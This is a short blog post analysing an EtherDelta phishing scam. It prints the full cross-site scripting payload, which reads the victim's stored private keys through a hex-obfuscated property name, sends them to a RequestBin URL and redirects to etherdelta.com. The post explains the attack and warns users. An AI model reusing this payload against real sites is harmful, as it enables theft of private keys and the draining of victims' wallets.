Another day, another EtherDelta scam
cryptocurrency·@skydrop·
0.000 HBDAnother day, another EtherDelta scam
<html>
<p><img src="https://mycuriocards.com/img/delta.png" width="430" height="260"/></p>
<p>This simple scam once again depends on tricking the victim into clicking a malicious link. </p>
<p>The code was hosted on the Google URL Shortener service and still appeared to be active at the time of writing:</p>
<p>https://goo.gl/#analytics/goo.gl/uKAuke/all_time</p>
<p>The payload was as follows:</p>
<pre><code>https://etherdelta.com/#0x"><br>
<script><br>
if (typeof g === "undefined" || g == 0) {<br>
var g = 0;<br>
m();<br>
} <br>
function m() {<br>
var a = main["\x45\x74\x68\x65\x72\x44\x65\x6c\x74\x61"].pks; <br>
// main["EtherDelta"].pks<br>
for (var x=0;x<a.length;x++) {<br>
if(a[x] != "") {<br>
$.ajax({<br>
url:"https://requestb.in/19nxov41?1="+a[x],<br>
async:false<br>
});<br>
g = 1;<br>
}<br>
}<br>
if (g == 1) {<br>
window.location.href = "https://etherdelta.com";<br>
}<br>
}<br>
</script><br>
<input d="-ETH<br>
</code></pre>
<p>The victim is redirected to https://etherdelta.com</p>
<p>The URL also contains a short script which reads <code>main["EtherDelta"].pks</code> - the victim's private key - into a variable then sends it to <a href="https://requestb.in/">RequestBin, </a>a site that allows users to collect and inspect HTTP requests.</p>
<p>The attacker is then able to easily gather victim's private keys and empty their wallets.</p>
<p>Please note this attack is again only effective against users who choose to import their private key into EtherDelta.</p>
</html>